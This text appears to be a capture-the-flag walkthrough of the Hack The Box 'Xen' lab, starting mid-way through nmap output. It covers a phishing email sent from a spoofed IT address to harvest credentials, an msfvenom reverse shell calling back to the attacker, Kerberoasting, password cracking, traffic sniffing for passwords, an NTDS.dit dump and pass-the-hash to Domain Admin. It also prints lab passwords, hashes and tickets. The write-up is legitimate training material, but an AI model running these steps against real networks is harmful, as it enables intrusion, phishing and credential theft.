GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8s, deviation: 0s, median: 8s TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 24.00 ms 10.14.14.1 2 24.00 ms humongousretail.com (10.13.38.12) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds E:\PENTEST>
It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
Web Directories
We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.
Opening the https://hunongousretail.com/remote, I get the following.
And browsing https://hunongousretail.com/jakarta, I got the following.
I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta. After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.
SMTP Enumeration
I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
I had found 4 addresses;
- sales@humongousretail.com
- it@humongousretail.com
- marketing@humongousretail.com
- legal@humongousretail.com
Now that I had these 4 addresses, I needed to ensure that I could send mail through. I decided to use an internal address to try and get a response from someone.
User Response
To see if I was getting a response, I had a listener running to capture anything that may come through.
nc -nlvp 80
I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My thoughts on this was to try and get the users to click on my link. My thoughts were as follows;
telnet 10.13.38.12 25 helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards
IT QUIT
I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something. The users should trust an email coming in from IT, or so you would think.
Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned. It was the user clicking on the link to the new portal and providing their credentials.
I had a username of pmorgan and a password of Summer1Summer!. Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.
I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.
I kept this up to see if I could get any more responses and I had one more.
The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users
pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@
Citrix XenAPP
I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan
And I now had access to a desktop.
I tried this for each user that I had and each of the worked and successfully logged in.
I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali
Once I had click ok, I was presented with a Desktop. I browsed to the Desktop of the user and I was presented with the 1st flag.
1 – XEN{wh0_n33d5_2f@?} Breach
Gaining a shell
Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them. I first made a note off all the users and desktops they were assigned to
I created the reverse shell that I wanted so that I could get a meterpreter session.
msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe
I then proceeded to setup m msfconsole as follows.
Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.
python -m SimpleHTTPServer 80
I then browsed to my machine on the vdesktop and downloaded the file.
I now started the exploit and got a meterpreter shell.
Privilege Escalation on Desktop
Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges. I decided to use the local exploit suggester.
I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester
Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated
I had successfully raised my privileges. I looked to see what was on the Administrator Desktop, and I had found the second flag.
2 – XEN{7ru573d_1n574ll3r5} Deploy
Further Enumeration
Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a
Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IP’s of the desktops, I chose to only scan a small range. I wanted to scan between 199 and 210.
I managed to get an additional 3 IP’s.
- 172.16.249.200 (DC)
- 172.16.249.201 (Citrix)
- 172.16.249.202 (NetScaler)
Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.
With the system shell that I had earlier, I decided to upload the Kerberoasting module.
Further credentials
I now wanted to see if there were any further credentials that I could find
PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.4.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [*] Found 1 user(s) to Kerberoast! [*] SamAccountName : mturner [*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local [*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt [*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt PS C:\Users\pmorgan\Desktop> dir Directory: C:\Users\pmorgan\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 4/4/2020 11:13 AM 7 cmd.bat -ar-- 4/6/2019 11:11 PM 19 flag.txt -a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1 -a--- 3/26/2020 10:56 AM 16128568 netscan64.exe -a--- 4/6/2020 8:57 PM 295 netscan64.lic -a--- 4/6/2020 8:57 PM 39301 netscan64.xml -a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1 -a--- 9/22/2019 10:20 AM 883600 putty.exe -a--- 11/27/2019 2:17 PM 198144 Rubeus.exe -a--- 4/6/2020 9:12 PM 2172 service_ticket.txt -a--- 3/28/2020 11:17 AM 832512 SharpHound.exe -a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1 -a--- 4/6/2020 8:59 PM 32665 winPEAS.bat -a--- 4/6/2020 8:59 PM 241152 winPEAS.exe [to get a proper command prompt we us] PS C:\Users\pmorgan\Desktop> type cmd.cmd cmd.exe PS C:\Users\pmorgan\Desktop> type service_ticket.txt $krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836 PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" . PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser PS C:\Users\pmorgan\Desktop> Bypass PS C:\Users\pmorgan\Desktop> .\Sharphound PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1 PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\ PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" . PS C:\Users\pmorgan\Desktop> PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1 PS C:\Users\pmorgan\Desktop> Get-NetUser PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName
I copied the contents of this token to a file named mturner so that I could now run this through hashcat.
I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with. I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsa–rules.git.
hashcat -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0
After several hours, I eventually got a hit on the password.
We now know that the password for mturner is 4install!
SMB Access
Now that I had the new credentials I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201
This showed that we had access to read the files locate in the Citrix$ folder. I connected to this to see what was inside the folder with smbclient tools.
proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local
I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.
I downloaded these file and was able to read the next flag.
3 – XEN{l364cy_5pn5_ftw} Ghost
Putty file Conversion
Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.
It seems this could be used in putty but has a password on it too. I needed to try and crack the password on this before I could proceed. I decided to convert this with putty2john. putty2john private.ppk > private.hash
Now that I had this file in a readable format for john, I tried to crack the password.
After several hours, all my password lists came up empty. I was unable to crack the password with what I had. I decided to look elsewhere to see what I could potentially use as a password list generator. I found a password generator that seemed interesting and decided to run with it. I found this at https://github.com/hashcat/kwprocessor
./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route
Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash
Now that I knew the password for the file, I could now convert the file for use with my system. To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa
I now had a key file that I could use.
Access to NetScaler
During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found the default username of the devices is nsroot. I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202
Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdump–examples/.
I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”
4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage
LDAP
Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it. The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap
I now had to transfer the file back to my machine for investigation. I used scp for this.
proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
I then opened this file within Wireshark to see what I could find.
Now going from the previous hint, I searched for the LDAP traffic and found a password.
The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
msf > use auxiliary/server/socks4a msf > set srvport 8888 msf > route add 172.16.249.0 255.255.255.0 1 msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK ServicePrincipalName Name MemberOf PasswordLastSet LastLogon ---------------------------------- ------- --------------------------------------- -------------------------- -------------------------- MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936 |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK $krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201 ProxyChains-3.1 (http://proxychains.sf.net) [+] Finding open SMB ports.... |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK [+] User SMB session establishd on 172.16.249.201... [+] IP: 172.16.249.201:445 Name: 172.16.249.201 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS Citrix$ READ ONLY IPC$ NO ACCESS ISOs NO ACCESS ISOs-TEST NO ACCESS root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK Enter HTB.LOCAL\mturner's password: 4install! Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed May 8 18:12:51 2019 .. D 0 Wed May 8 18:12:51 2019 Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019 flag.txt AR 20 Sun Mar 31 11:25:10 2019 private.ppk A 1486 Wed May 8 18:21:51 2019 XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019 10485247 blocks of size 4096. 6344443 blocks available
Doppelganger
The term doppelganger is a non-biologically related look-alike (Wikipedia). This provided me with the hint of looking back at the other accounts that were active on the domain. I immediately got access to a shell again on the desktop and looked up domain details.
I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.
After all, I had tried this account in so many different places to access different resources and none were successful.
net user /domain
After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password. These essentially shared the same password. This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb
root@kali:~/xen# proxychains ruby winrmshell2withupload.rb ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK PS htb\backup-svc@DC Documents> PS htb\backup-svc@DC Desktop> type flag.txt XEN{y_5h4r3d_p@55w0Rd5?} PS htb\backup-svc@DC Desktop>
I looked on the Desktop of backup-svc and found the next flag.
5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger
Privileges
Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv
This was sure interesting. It seems I had a few privileges including the Backup and Restore. This seemed obvious though with the account being named backup-svc.
I first tried to access the Administrator Desktop and was denied access.
From this I knew something had to be done with backup privileges. I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes. This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.
I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow. This was highlighted in the following document. https://github.com/decoder–it/whoami–priv–
Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.
portfwd add -l 3389 -r 172.16.249.200 -p 3389
I then tried to open an RDP session to the machine using remmina.
I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina
Install freerdp-x11
sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc ProxyChains-3.1 (http://proxychains.sf.net) [03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK Password: #S3rvice#@cc [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32 [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16 [03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
And I was given the RDP access I was looking for.
I now decided to run through diskshadow to see if I could create a shadow of the drive.
Shadow Copies
Diskshadow set context persistent nowriters add volume c: alias dmwong create expose %dmwong% z:
Once I had created the backup, I restore this by importing the modules found at
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.
I opened PowerShell and imported the 2 modules.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak
Now that I had access to these files, I continued to download them onto my system for offline cracking.
Domain Admin
Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL
This provided me with all the hashes from the Active Directory Database. Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.
proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
Author – Puckiestyle